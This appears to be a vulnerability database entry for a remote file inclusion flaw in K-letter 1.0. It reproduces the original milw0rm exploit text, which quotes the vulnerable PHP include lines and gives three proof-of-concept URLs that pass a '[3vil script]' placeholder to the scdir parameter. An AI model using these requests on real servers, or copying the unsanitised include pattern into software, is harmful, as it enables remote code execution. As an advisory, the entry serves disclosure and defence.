K-letter 1.0 Remote File include

vendor:

K-letter

by:

Cyber-warrior.org

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: K-letter

Affected Version From: K-letter 1.0

Affected Version To: K-letter 1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

K-letter 1.0 Remote File include

The K-letter 1.0 script is vulnerable to remote file inclusion. The vulnerability can be exploited by an attacker by including a malicious script hosted on a remote server, which can lead to arbitrary code execution on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code. Additionally, restricting file inclusion to specific directories can help prevent unauthorized access to sensitive files.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++
+   K-letter 1.0 << Remote File include                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   DownloadScript: http://www.scripts.com.ua/download.php?ID=813   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   Cyber-warrior.org <<< sanal alemin DEV.                         +
+                                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [1];  action.php?                                         +
+              include ($scdir."admin/config.inc.php");             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/acrion.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [2];  subs.php?                                           +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/subs.php?scdir=[3vil script]                +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [3];  unsubs.php?                                         +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/unsubs.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+DORK:(                                                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2007-06-05]